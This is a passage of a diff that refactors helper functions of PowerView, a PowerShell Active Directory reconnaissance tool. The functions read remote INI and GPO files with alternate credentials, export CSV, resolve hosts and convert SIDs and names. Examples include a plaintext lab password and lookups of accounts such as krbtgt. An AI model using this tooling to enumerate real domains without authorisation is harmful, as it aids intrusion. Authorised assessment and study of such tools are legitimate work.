+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-IniContent -Path \\PRIMARY.testlab.local\C$\Temp\GptTmpl.inf -Credential $Cred
+
+.INPUTS
+
+String
+
+Accepts one or more .ini paths on the pipeline.
+
+.OUTPUTS
+
+Hashtable
+
+Ouputs a hashtable representing the parsed .ini file.
+
+.LINK
+
+https://blogs.technet.microsoft.com/heyscriptingguy/2011/08/20/use-powershell-to-work-with-any-ini-file/
+#>
+
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType([Hashtable])]
[CmdletBinding()]
Param(
- [Parameter(Mandatory=$True, ValueFromPipeline=$True, ValueFromPipelineByPropertyName=$True)]
- [Alias('FullName')]
- [ValidateScript({ Test-Path -Path $_ })]
+ [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('FullName', 'Name')]
+ [ValidateNotNullOrEmpty()]
[String[]]
- $Path
+ $Path,
+
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty,
+
+ [Switch]
+ $OutputObject
)
- ForEach($TargetPath in $Path) {
- $IniObject = @{}
- Switch -Regex -File $TargetPath {
- "^\[(.+)\]" # Section
- {
- $Section = $matches[1].Trim()
- $IniObject[$Section] = @{}
- $CommentCount = 0
+ BEGIN {
+ $MappedComputers = @{}
+ }
+
+ PROCESS {
+ ForEach ($TargetPath in $Path) {
+ if (($TargetPath -Match '\\\\.*\\.*') -and ($PSBoundParameters['Credential'])) {
+ $HostComputer = (New-Object System.Uri($TargetPath)).Host
+ if (-not $MappedComputers[$HostComputer]) {
+ # map IPC$ to this computer if it's not already
+ Add-RemoteConnection -ComputerName $HostComputer -Credential $Credential
+ $MappedComputers[$HostComputer] = $True
+ }
}
- "^(;.*)$" # Comment
- {
- $Value = $matches[1].Trim()
- $CommentCount = $CommentCount + 1
- $Name = 'Comment' + $CommentCount
- $IniObject[$Section][$Name] = $Value
- }
- "(.+?)\s*=(.*)" # Key
- {
- $Name, $Value = $matches[1..2]
- $Name = $Name.Trim()
- $Values = $Value.split(',') | ForEach-Object {$_.Trim()}
- if($Values -isnot [System.Array]) {$Values = @($Values)}
- $IniObject[$Section][$Name] = $Values
+
+ if (Test-Path -Path $TargetPath) {
+ if ($PSBoundParameters['OutputObject']) {
+ $IniObject = New-Object PSObject
+ }
+ else {
+ $IniObject = @{}
+ }
+ Switch -Regex -File $TargetPath {
+ "^\[(.+)\]" # Section
+ {
+ $Section = $matches[1].Trim()
+ if ($PSBoundParameters['OutputObject']) {
+ $Section = $Section.Replace(' ', '')
+ $SectionObject = New-Object PSObject
+ $IniObject | Add-Member Noteproperty $Section $SectionObject
+ }
+ else {
+ $IniObject[$Section] = @{}
+ }
+ $CommentCount = 0
+ }
+ "^(;.*)$" # Comment
+ {
+ $Value = $matches[1].Trim()
+ $CommentCount = $CommentCount + 1
+ $Name = 'Comment' + $CommentCount
+ if ($PSBoundParameters['OutputObject']) {
+ $Name = $Name.Replace(' ', '')
+ $IniObject.$Section | Add-Member Noteproperty $Name $Value
+ }
+ else {
+ $IniObject[$Section][$Name] = $Value
+ }
+ }
+ "(.+?)\s*=(.*)" # Key
+ {
+ $Name, $Value = $matches[1..2]
+ $Name = $Name.Trim()
+ $Values = $Value.split(',') | ForEach-Object { $_.Trim() }
+
+ # if ($Values -isnot [System.Array]) { $Values = @($Values) }
+
+ if ($PSBoundParameters['OutputObject']) {
+ $Name = $Name.Replace(' ', '')
+ $IniObject.$Section | Add-Member Noteproperty $Name $Values
+ }
+ else {
+ $IniObject[$Section][$Name] = $Values
+ }
+ }
+ }
+ $IniObject
}
}
- $IniObject
+ }
+
+ END {
+ # remove the IPC$ mappings
+ $MappedComputers.Keys | Remove-RemoteConnection
}
}
-filter Export-PowerViewCSV {
+
+function Export-PowerViewCSV {
<#
- .SYNOPSIS
+.SYNOPSIS
+
+Converts objects into a series of comma-separated (CSV) strings and saves the
+strings in a CSV file in a thread-safe manner.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: None
+
+.DESCRIPTION
+
+This helper exports an -InputObject to a .csv in a thread-safe manner
+using a mutex. This is so the various multi-threaded functions in
+PowerView has a thread-safe way to export output to the same file.
+Uses .NET IO.FileStream/IO.StreamWriter objects for speed.
+
+Originally based on Dmitry Sotnikov's Export-CSV code: http://poshcode.org/1590
+
+.PARAMETER InputObject
+
+Specifies the objects to export as CSV strings.
+
+.PARAMETER Path
+
+Specifies the path to the CSV output file.
+
+.PARAMETER Delimiter
+
+Specifies a delimiter to separate the property values. The default is a comma (,)
- This helper exports an -InputObject to a .csv in a thread-safe manner
- using a mutex. This is so the various multi-threaded functions in
- PowerView has a thread-safe way to export output to the same file.
-
- Based partially on Dmitry Sotnikov's Export-CSV code
- at http://poshcode.org/1590
+.PARAMETER Append
- .LINK
+Indicates that this cmdlet adds the CSV output to the end of the specified file.
+Without this parameter, Export-PowerViewCSV replaces the file contents without warning.
- http://poshcode.org/1590
- http://dmitrysotnikov.wordpress.com/2010/01/19/Export-Csv-append/
+.EXAMPLE
+
+Get-DomainUser | Export-PowerViewCSV -Path "users.csv"
+
+.EXAMPLE
+
+Get-DomainUser | Export-PowerViewCSV -Path "users.csv" -Append -Delimiter '|'
+
+.INPUTS
+
+PSObject
+
+Accepts one or more PSObjects on the pipeline.
+
+.LINK
+
+http://poshcode.org/1590
+http://dmitrysotnikov.wordpress.com/2010/01/19/Export-Csv-append/
#>
+
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [CmdletBinding()]
Param(
- [Parameter(Mandatory=$True, ValueFromPipeline=$True, ValueFromPipelineByPropertyName=$True)]
+ [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[System.Management.Automation.PSObject[]]
$InputObject,
- [Parameter(Mandatory=$True, Position=0)]
+ [Parameter(Mandatory = $True, Position = 1)]
+ [ValidateNotNullOrEmpty()]
[String]
+ $Path,
+
+ [Parameter(Position = 2)]
[ValidateNotNullOrEmpty()]
- $OutFile
+ [Char]
+ $Delimiter = ',',
+
+ [Switch]
+ $Append
)
- $ObjectCSV = $InputObject | ConvertTo-Csv -NoTypeInformation
+ BEGIN {
+ $OutputPath = [IO.Path]::GetFullPath($PSBoundParameters['Path'])
+ $Exists = [System.IO.File]::Exists($OutputPath)
- # mutex so threaded code doesn't stomp on the output file
- $Mutex = New-Object System.Threading.Mutex $False,'CSVMutex';
- $Null = $Mutex.WaitOne()
+ # mutex so threaded code doesn't stomp on the output file
+ $Mutex = New-Object System.Threading.Mutex $False,'CSVMutex'
+ $Null = $Mutex.WaitOne()
- if (Test-Path -Path $OutFile) {
- # hack to skip the first line of output if the file already exists
- $ObjectCSV | ForEach-Object { $Start=$True }{ if ($Start) {$Start=$False} else {$_} } | Out-File -Encoding 'ASCII' -Append -FilePath $OutFile
+ if ($PSBoundParameters['Append']) {
+ $FileMode = [System.IO.FileMode]::Append
+ }
+ else {
+ $FileMode = [System.IO.FileMode]::Create
+ $Exists = $False
+ }
+
+ $CSVStream = New-Object IO.FileStream($OutputPath, $FileMode, [System.IO.FileAccess]::Write, [IO.FileShare]::Read)
+ $CSVWriter = New-Object System.IO.StreamWriter($CSVStream)
+ $CSVWriter.AutoFlush = $True
}
- else {
- $ObjectCSV | Out-File -Encoding 'ASCII' -Append -FilePath $OutFile
+
+ PROCESS {
+ ForEach ($Entry in $InputObject) {
+ $ObjectCSV = ConvertTo-Csv -InputObject $Entry -Delimiter $Delimiter -NoTypeInformation
+
+ if (-not $Exists) {
+ # output the object field names as well
+ $ObjectCSV | ForEach-Object { $CSVWriter.WriteLine($_) }
+ $Exists = $True
+ }
+ else {
+ # only output object field data
+ $ObjectCSV[1..($ObjectCSV.Length-1)] | ForEach-Object { $CSVWriter.WriteLine($_) }
+ }
+ }
}
- $Mutex.ReleaseMutex()
+ END {
+ $Mutex.ReleaseMutex()
+ $CSVWriter.Dispose()
+ $CSVStream.Dispose()
+ }
}
-filter Get-IPAddress {
+function Resolve-IPAddress {
<#
- .SYNOPSIS
+.SYNOPSIS
+
+Resolves a given hostename to its associated IPv4 address.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: None
+
+.DESCRIPTION
+
+Resolves a given hostename to its associated IPv4 address using
+[Net.Dns]::GetHostEntry(). If no hostname is provided, the default
+is the IP address of the localhost.
+
+.EXAMPLE
+
+Resolve-IPAddress -ComputerName SERVER
+
+.EXAMPLE
- Resolves a given hostename to its associated IPv4 address.
- If no hostname is provided, it defaults to returning
- the IP address of the localhost.
+@("SERVER1", "SERVER2") | Resolve-IPAddress
- .EXAMPLE
+.INPUTS
- PS C:\> Get-IPAddress -ComputerName SERVER
-
- Return the IPv4 address of 'SERVER'
+String
- .EXAMPLE
+Accepts one or more IP address strings on the pipeline.
- PS C:\> Get-Content .\hostnames.txt | Get-IPAddress
+.OUTPUTS
- Get the IP addresses of all hostnames in an input file.
+System.Management.Automation.PSCustomObject
+
+A custom PSObject with the ComputerName and IPAddress.
#>
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType('System.Management.Automation.PSCustomObject')]
[CmdletBinding()]
- param(
- [Parameter(Position=0, ValueFromPipeline=$True)]
- [Alias('HostName')]
- [String]
- $ComputerName = $Env:ComputerName
+ Param(
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('HostName', 'dnshostname', 'name')]
+ [ValidateNotNullOrEmpty()]
+ [String[]]
+ $ComputerName = $Env:COMPUTERNAME
)
- try {
- # extract the computer name from whatever object was passed on the pipeline
- $Computer = $ComputerName | Get-NameField
-
- # get the IP resolution of this specified hostname
- @(([Net.Dns]::GetHostEntry($Computer)).AddressList) | ForEach-Object {
- if ($_.AddressFamily -eq 'InterNetwork') {
- $Out = New-Object PSObject
- $Out | Add-Member Noteproperty 'ComputerName' $Computer
- $Out | Add-Member Noteproperty 'IPAddress' $_.IPAddressToString
- $Out
+ PROCESS {
+ ForEach ($Computer in $ComputerName) {
+ try {
+ @(([Net.Dns]::GetHostEntry($Computer)).AddressList) | ForEach-Object {
+ if ($_.AddressFamily -eq 'InterNetwork') {
+ $Out = New-Object PSObject
+ $Out | Add-Member Noteproperty 'ComputerName' $Computer
+ $Out | Add-Member Noteproperty 'IPAddress' $_.IPAddressToString
+ $Out
+ }
+ }
+ }
+ catch {
+ Write-Verbose "[Resolve-IPAddress] Could not resolve $Computer to an IP Address."
}
}
}
- catch {
- Write-Verbose -Message 'Could not resolve host to an IP Address.'
- }
}
-filter Convert-NameToSid {
+function ConvertTo-SID {
<#
- .SYNOPSIS
+.SYNOPSIS
+
+Converts a given user/group name to a security identifier (SID).
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Convert-ADName, Get-DomainObject, Get-Domain
+
+.DESCRIPTION
+
+Converts a "DOMAIN\username" syntax to a security identifier (SID)
+using System.Security.Principal.NTAccount's translate function. If alternate
+credentials are supplied, then Get-ADObject is used to try to map the name
+to a security identifier.
+
+.PARAMETER ObjectName
+
+The user/group name to convert, can be 'user' or 'DOMAIN\user' format.
+
+.PARAMETER Domain
- Converts a given user/group name to a security identifier (SID).
+Specifies the domain to use for the translation, defaults to the current domain.
- .PARAMETER ObjectName
+.PARAMETER Server
- The user/group name to convert, can be 'user' or 'DOMAIN\user' format.
+Specifies an Active Directory server (domain controller) to bind to for the translation.
- .PARAMETER Domain
+.PARAMETER Credential
- Specific domain for the given user account, defaults to the current domain.
+Specifies an alternate credential to use for the translation.
- .EXAMPLE
+.EXAMPLE
- PS C:\> Convert-NameToSid 'DEV\dfm'
+ConvertTo-SID 'DEV\dfm'
+
+.EXAMPLE
+
+'DEV\dfm','DEV\krbtgt' | ConvertTo-SID
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+'TESTLAB\dfm' | ConvertTo-SID -Credential $Cred
+
+.INPUTS
+
+String
+
+Accepts one or more username specification strings on the pipeline.
+
+.OUTPUTS
+
+String
+
+A string representing the SID of the translated name.
#>
+
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType([String])]
[CmdletBinding()]
- param(
- [Parameter(Mandatory=$True, ValueFromPipeline=$True)]
- [String]
- [Alias('Name')]
+ Param(
+ [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('Name', 'Identity')]
+ [String[]]
$ObjectName,
+ [ValidateNotNullOrEmpty()]
+ [String]
+ $Domain,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
[String]
- $Domain
+ $Server,
+
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
)
- $ObjectName = $ObjectName -Replace "/","\"
-
- if($ObjectName.Contains("\")) {
- # if we get a DOMAIN\user format, auto convert it
- $Domain = $ObjectName.Split("\")[0]
- $ObjectName = $ObjectName.Split("\")[1]
- }
- elseif(-not $Domain) {
- $Domain = (Get-NetDomain).Name
+ BEGIN {
+ $DomainSearcherArguments = @{}
+ if ($PSBoundParameters['Domain']) { $DomainSearcherArguments['Domain'] = $Domain }
+ if ($PSBoundParameters['Server']) { $DomainSearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['Credential']) { $DomainSearcherArguments['Credential'] = $Credential }
}
- try {
- $Obj = (New-Object System.Security.Principal.NTAccount($Domain, $ObjectName))
- $SID = $Obj.Translate([System.Security.Principal.SecurityIdentifier]).Value
-
- $Out = New-Object PSObject
- $Out | Add-Member Noteproperty 'ObjectName' $ObjectName
- $Out | Add-Member Noteproperty 'SID' $SID
- $Out
- }
- catch {
- Write-Verbose "Invalid object/name: $Domain\$ObjectName"
- $Null
+ PROCESS {
+ ForEach ($Object in $ObjectName) {
+ $Object = $Object -Replace '/','\'
+
+ if ($PSBoundParameters['Credential']) {
+ $DN = Convert-ADName -Identity $Object -OutputType 'DN' @DomainSearcherArguments
+ if ($DN) {
+ $UserDomain = $DN.SubString($DN.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
+ $UserName = $DN.Split(',')[0].split('=')[1]
+
+ $DomainSearcherArguments['Identity'] = $UserName
+ $DomainSearcherArguments['Domain'] = $UserDomain
+ $DomainSearcherArguments['Properties'] = 'objectsid'
+ Get-DomainObject @DomainSearcherArguments | Select-Object -Expand objectsid
+ }
+ }
+ else {
+ try {
+ if ($Object.Contains('\')) {
+ $Domain = $Object.Split('\')[0]
+ $Object = $Object.Split('\')[1]
+ }
+ elseif (-not $PSBoundParameters['Domain']) {
+ $DomainSearcherArguments = @{}
+ $Domain = (Get-Domain @DomainSearcherArguments).Name
+ }
+
+ $Obj = (New-Object System.Security.Principal.NTAccount($Domain, $Object))
+ $Obj.Translate([System.Security.Principal.SecurityIdentifier]).Value
+ }
+ catch {
+ Write-Verbose "[ConvertTo-SID] Error converting $Domain\$Object : $_"
+ }
+ }
+ }
}
}
-filter Convert-SidToName {
+function ConvertFrom-SID {
<#
- .SYNOPSIS
-
- Converts a security identifier (SID) to a group/user name.
+.SYNOPSIS
- .PARAMETER SID
-
- The SID to convert.
+Converts a security identifier (SID) to a group/user name.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Convert-ADName
+
+.DESCRIPTION
+
+Converts a security identifier string (SID) to a group/user name
+using Convert-ADName.
+
+.PARAMETER ObjectSid
+
+Specifies one or more SIDs to convert.
+
+.PARAMETER Domain
+
+Specifies the domain to use for the translation, defaults to the current domain.
+
+.PARAMETER Server
+
+Specifies an Active Directory server (domain controller) to bind to for the translation.
+
+.PARAMETER Credential
+
+Specifies an alternate credential to use for the translation.
+
+.EXAMPLE
+
+ConvertFrom-SID S-1-5-21-890171859-3433809279-3366196753-1108
- .EXAMPLE
+TESTLAB\harmj0y
- PS C:\> Convert-SidToName S-1-5-21-2620891829-2411261497-1773853088-1105
+.EXAMPLE
+
+"S-1-5-21-890171859-3433809279-3366196753-1107", "S-1-5-21-890171859-3433809279-3366196753-1108", "S-1-5-32-562" | ConvertFrom-SID
+
+TESTLAB\WINDOWS2$
+TESTLAB\harmj0y
+BUILTIN\Distributed COM Users
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm', $SecPassword)
+ConvertFrom-SID S-1-5-21-890171859-3433809279-3366196753-1108 -Credential $Cred
+
+TESTLAB\harmj0y
+
+.INPUTS
+
+String
+
+Accepts one or more SID strings on the pipeline.
+
+.OUTPUTS
+
+String
+
+The converted DOMAIN\username.
#>
+
+ [OutputType([String])]
[CmdletBinding()]
- param(
- [Parameter(Mandatory=$True, ValueFromPipeline=$True)]
- [String]
+ Param(
+ [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('SID')]
[ValidatePattern('^S-1-.*')]
- $SID
+ [String[]]
+ $ObjectSid,
+
+ [ValidateNotNullOrEmpty()]
+ [String]
+ $Domain,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
+ [String]
+ $Server,
+
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
)
- try {
- $SID2 = $SID.trim('*')
-
- # try to resolve any built-in SIDs first
- # from https://support.microsoft.com/en-us/kb/243330
- Switch ($SID2) {
- 'S-1-0' { 'Null Authority' }
- 'S-1-0-0' { 'Nobody' }
- 'S-1-1' { 'World Authority' }
- 'S-1-1-0' { 'Everyone' }
- 'S-1-2' { 'Local Authority' }
- 'S-1-2-0' { 'Local' }
- 'S-1-2-1' { 'Console Logon ' }
- 'S-1-3' { 'Creator Authority' }
- 'S-1-3-0' { 'Creator Owner' }
- 'S-1-3-1' { 'Creator Group' }
- 'S-1-3-2' { 'Creator Owner Server' }
- 'S-1-3-3' { 'Creator Group Server' }
- 'S-1-3-4' { 'Owner Rights' }
- 'S-1-4' { 'Non-unique Authority' }
- 'S-1-5' { 'NT Authority' }
- 'S-1-5-1' { 'Dialup' }
- 'S-1-5-2' { 'Network' }
- 'S-1-5-3' { 'Batch' }
- 'S-1-5-4' { 'Interactive' }
- 'S-1-5-6' { 'Service' }
- 'S-1-5-7' { 'Anonymous' }
- 'S-1-5-8' { 'Proxy' }
- 'S-1-5-9' { 'Enterprise Domain Controllers' }
- 'S-1-5-10' { 'Principal Self' }
- 'S-1-5-11' { 'Authenticated Users' }
- 'S-1-5-12' { 'Restricted Code' }
- 'S-1-5-13' { 'Terminal Server Users' }
- 'S-1-5-14' { 'Remote Interactive Logon' }
- 'S-1-5-15' { 'This Organization ' }
- 'S-1-5-17' { 'This Organization ' }
- 'S-1-5-18' { 'Local System' }
- 'S-1-5-19' { 'NT Authority' }
- 'S-1-5-20' { 'NT Authority' }
- 'S-1-5-80-0' { 'All Services ' }
- 'S-1-5-32-544' { 'BUILTIN\Administrators' }
- 'S-1-5-32-545' { 'BUILTIN\Users' }
- 'S-1-5-32-546' { 'BUILTIN\Guests' }
- 'S-1-5-32-547' { 'BUILTIN\Power Users' }
- 'S-1-5-32-548' { 'BUILTIN\Account Operators' }
- 'S-1-5-32-549' { 'BUILTIN\Server Operators' }
- 'S-1-5-32-550' { 'BUILTIN\Print Operators' }
- 'S-1-5-32-551' { 'BUILTIN\Backup Operators' }
- 'S-1-5-32-552' { 'BUILTIN\Replicators' }
- 'S-1-5-32-554' { 'BUILTIN\Pre-Windows 2000 Compatible Access' }
- 'S-1-5-32-555' { 'BUILTIN\Remote Desktop Users' }
- 'S-1-5-32-556' { 'BUILTIN\Network Configuration Operators' }
- 'S-1-5-32-557' { 'BUILTIN\Incoming Forest Trust Builders' }
- 'S-1-5-32-558' { 'BUILTIN\Performance Monitor Users' }
- 'S-1-5-32-559' { 'BUILTIN\Performance Log Users' }
- 'S-1-5-32-560' { 'BUILTIN\Windows Authorization Access Group' }
- 'S-1-5-32-561' { 'BUILTIN\Terminal Server License Servers' }
- 'S-1-5-32-562' { 'BUILTIN\Distributed COM Users' }
- 'S-1-5-32-569' { 'BUILTIN\Cryptographic Operators' }
- 'S-1-5-32-573' { 'BUILTIN\Event Log Readers' }
- 'S-1-5-32-574' { 'BUILTIN\Certificate Service DCOM Access' }
- 'S-1-5-32-575' { 'BUILTIN\RDS Remote Access Servers' }
- 'S-1-5-32-576' { 'BUILTIN\RDS Endpoint Servers' }
- 'S-1-5-32-577' { 'BUILTIN\RDS Management Servers' }
- 'S-1-5-32-578' { 'BUILTIN\Hyper-V Administrators' }
- 'S-1-5-32-579' { 'BUILTIN\Access Control Assistance Operators' }
- 'S-1-5-32-580' { 'BUILTIN\Access Control Assistance Operators' }
- Default {
- $Obj = (New-Object System.Security.Principal.SecurityIdentifier($SID2))
- $Obj.Translate( [System.Security.Principal.NTAccount]).Value
+ BEGIN {
+ $ADNameArguments = @{}
+ if ($PSBoundParameters['Domain']) { $ADNameArguments['Domain'] = $Domain }
+ if ($PSBoundParameters['Server']) { $ADNameArguments['Server'] = $Server }
+ if ($PSBoundParameters['Credential']) { $ADNameArguments['Credential'] = $Credential }
+ }
+
+ PROCESS {
+ ForEach ($TargetSid in $ObjectSid) {
+ $TargetSid = $TargetSid.trim('*')
+ try {
+ # try to resolve any built-in SIDs first - https://support.microsoft.com/en-us/kb/243330
+ Switch ($TargetSid) {
+ 'S-1-0' { 'Null Authority' }
+ 'S-1-0-0' { 'Nobody' }
+ 'S-1-1' { 'World Authority' }
+ 'S-1-1-0' { 'Everyone' }
+ 'S-1-2' { 'Local Authority' }
+ 'S-1-2-0' { 'Local' }
+ 'S-1-2-1' { 'Console Logon ' }
+ 'S-1-3' { 'Creator Authority' }
+ 'S-1-3-0' { 'Creator Owner' }
+ 'S-1-3-1' { 'Creator Group' }
+ 'S-1-3-2' { 'Creator Owner Server' }
+ 'S-1-3-3' { 'Creator Group Server' }
+ 'S-1-3-4' { 'Owner Rights' }
+ 'S-1-4' { 'Non-unique Authority' }
+ 'S-1-5' { 'NT Authority' }
+ 'S-1-5-1' { 'Dialup' }
+ 'S-1-5-2' { 'Network' }
+ 'S-1-5-3' { 'Batch' }
+ 'S-1-5-4' { 'Interactive' }
+ 'S-1-5-6' { 'Service' }
+ 'S-1-5-7' { 'Anonymous' }
+ 'S-1-5-8' { 'Proxy' }
+ 'S-1-5-9' { 'Enterprise Domain Controllers' }
+ 'S-1-5-10' { 'Principal Self' }
+ 'S-1-5-11' { 'Authenticated Users' }
+ 'S-1-5-12' { 'Restricted Code' }
+ 'S-1-5-13' { 'Terminal Server Users' }
+ 'S-1-5-14' { 'Remote Interactive Logon' }
+ 'S-1-5-15' { 'This Organization ' }
+ 'S-1-5-17' { 'This Organization ' }
+ 'S-1-5-18' { 'Local System' }
+ 'S-1-5-19' { 'NT Authority' }
+ 'S-1-5-20' { 'NT Authority' }
+ 'S-1-5-80-0' { 'All Services ' }
+ 'S-1-5-32-544' { 'BUILTIN\Administrators' }
+ 'S-1-5-32-545' { 'BUILTIN\Users' }
+ 'S-1-5-32-546' { 'BUILTIN\Guests' }
+ 'S-1-5-32-547' { 'BUILTIN\Power Users' }
+ 'S-1-5-32-548' { 'BUILTIN\Account Operators' }
+ 'S-1-5-32-549' { 'BUILTIN\Server Operators' }
+ 'S-1-5-32-550' { 'BUILTIN\Print Operators' }
+ 'S-1-5-32-551' { 'BUILTIN\Backup Operators' }
+ 'S-1-5-32-552' { 'BUILTIN\Replicators' }
+ 'S-1-5-32-554' { 'BUILTIN\Pre-Windows 2000 Compatible Access' }
+ 'S-1-5-32-555' { 'BUILTIN\Remote Desktop Users' }
+ 'S-1-5-32-556' { 'BUILTIN\Network Configuration Operators' }
+ 'S-1-5-32-557' { 'BUILTIN\Incoming Forest Trust Builders' }
+ 'S-1-5-32-558' { 'BUILTIN\Performance Monitor Users' }
+ 'S-1-5-32-559' { 'BUILTIN\Performance Log Users' }
+ 'S-1-5-32-560' { 'BUILTIN\Windows Authorization Access Group' }
+ 'S-1-5-32-561' { 'BUILTIN\Terminal Server License Servers' }
+ 'S-1-5-32-562' { 'BUILTIN\Distributed COM Users' }
+ 'S-1-5-32-569' { 'BUILTIN\Cryptographic Operators' }
+ 'S-1-5-32-573' { 'BUILTIN\Event Log Readers' }
+ 'S-1-5-32-574' { 'BUILTIN\Certificate Service DCOM Access' }
+ 'S-1-5-32-575' { 'BUILTIN\RDS Remote Access Servers' }
+ 'S-1-5-32-576' { 'BUILTIN\RDS Endpoint Servers' }
+ 'S-1-5-32-577' { 'BUILTIN\RDS Management Servers' }
+ 'S-1-5-32-578' { 'BUILTIN\Hyper-V Administrators' }
+ 'S-1-5-32-579' { 'BUILTIN\Access Control Assistance Operators' }
+ 'S-1-5-32-580' { 'BUILTIN\Access Control Assistance Operators' }
+ Default {
+ Convert-ADName -Identity $TargetSid @ADNameArguments
+ }
+ }
+ }
+ catch {
+ Write-Verbose "[ConvertFrom-SID] Error converting SID '$TargetSid' : $_"
}
}
}
- catch {
- Write-Verbose "Invalid SID: $SID"
- $SID
- }
}
-filter Convert-ADName {
+function Convert-ADName {
<#
- .SYNOPSIS
+.SYNOPSIS
+
+Converts Active Directory object names between a variety of formats.
+
+Author: Bill Stewart, Pasquale Lantella
+Modifications: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: None
+
+.DESCRIPTION
+
+This function is heavily based on Bill Stewart's code and Pasquale Lantella's code (in LINK)
+and translates Active Directory names between various formats using the NameTranslate COM object.
+
+.PARAMETER Identity
+
+Specifies the Active Directory object name to translate, of the following form:
+
+ DN short for 'distinguished name'; e.g., 'CN=Phineas Flynn,OU=Engineers,DC=fabrikam,DC=com'
+ Canonical canonical name; e.g., 'fabrikam.com/Engineers/Phineas Flynn'
+ NT4 domain\username; e.g., 'fabrikam\pflynn'
+ Display display name, e.g. 'pflynn'
+ DomainSimple simple domain name format, e.g. 'pflynn@fabrikam.com'
+ EnterpriseSimple simple enterprise name format, e.g. 'pflynn@fabrikam.com'
+ GUID GUID; e.g., '{95ee9fff-3436-11d1-b2b0-d15ae3ac8436}'
+ UPN user principal name; e.g., 'pflynn@fabrikam.com'
+ CanonicalEx extended canonical name format
+ SPN service principal name format; e.g. 'HTTP/kairomac.contoso.com'
+ SID Security Identifier; e.g., 'S-1-5-21-12986231-600641547-709122288-57999'
+
+.PARAMETER OutputType
+
+Specifies the output name type you want to convert to, which must be one of the following:
+
+ DN short for 'distinguished name'; e.g., 'CN=Phineas Flynn,OU=Engineers,DC=fabrikam,DC=com'
+ Canonical canonical name; e.g., 'fabrikam.com/Engineers/Phineas Flynn'
+ NT4 domain\username; e.g., 'fabrikam\pflynn'
+ Display display name, e.g. 'pflynn'
+ DomainSimple simple domain name format, e.g. 'pflynn@fabrikam.com'
+ EnterpriseSimple simple enterprise name format, e.g. 'pflynn@fabrikam.com'
+ GUID GUID; e.g., '{95ee9fff-3436-11d1-b2b0-d15ae3ac8436}'
+ UPN user principal name; e.g., 'pflynn@fabrikam.com'
+ CanonicalEx extended canonical name format, e.g. 'fabrikam.com/Users/Phineas Flynn'
+ SPN service principal name format; e.g. 'HTTP/kairomac.contoso.com'
+
+.PARAMETER Domain
+
+Specifies the domain to use for the translation, defaults to the current domain.
+
+.PARAMETER Server
- Converts user/group names from NT4 (DOMAIN\user) or domainSimple (user@domain.com)
- to canonical format (domain.com/Users/user) or NT4.
+Specifies an Active Directory server (domain controller) to bind to for the translation.
- Based on Bill Stewart's code from this article:
- http://windowsitpro.com/active-directory/translating-active-directory-object-names-between-formats
+.PARAMETER Credential
- .PARAMETER ObjectName
+Specifies an alternate credential to use for the translation.
- The user/group name to convert.
+.EXAMPLE
- .PARAMETER InputType
+Convert-ADName -Identity "TESTLAB\harmj0y"
- The InputType of the user/group name ("NT4","Simple","Canonical").
+harmj0y@testlab.local
- .PARAMETER OutputType
+.EXAMPLE
- The OutputType of the user/group name ("NT4","Simple","Canonical").
+"TESTLAB\krbtgt", "CN=Administrator,CN=Users,DC=testlab,DC=local" | Convert-ADName -OutputType Canonical
- .EXAMPLE
+testlab.local/Users/krbtgt
+testlab.local/Users/Administrator
- PS C:\> Convert-ADName -ObjectName "dev\dfm"
-
- Returns "dev.testlab.local/Users/Dave"
+.EXAMPLE
- .EXAMPLE
+Convert-ADName -OutputType dn -Identity 'TESTLAB\harmj0y' -Server PRIMARY.testlab.local
- PS C:\> Convert-SidToName "S-..." | Convert-ADName
-
- Returns the canonical name for the resolved SID.
+CN=harmj0y,CN=Users,DC=testlab,DC=local
- .LINK
+.EXAMPLE
- http://windowsitpro.com/active-directory/translating-active-directory-object-names-between-formats
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm', $SecPassword)
+'S-1-5-21-890171859-3433809279-3366196753-1108' | Convert-ADNAme -Credential $Cred
+
+TESTLAB\harmj0y
+
+.INPUTS
+
+String
+
+Accepts one or more objects name strings on the pipeline.
+
+.OUTPUTS
+
+String
+
+Outputs a string representing the converted name.
+
+.LINK
+
+http://windowsitpro.com/active-directory/translating-active-directory-object-names-between-formats
+https://gallery.technet.microsoft.com/scriptcenter/Translating-Active-5c80dd67
#>
+
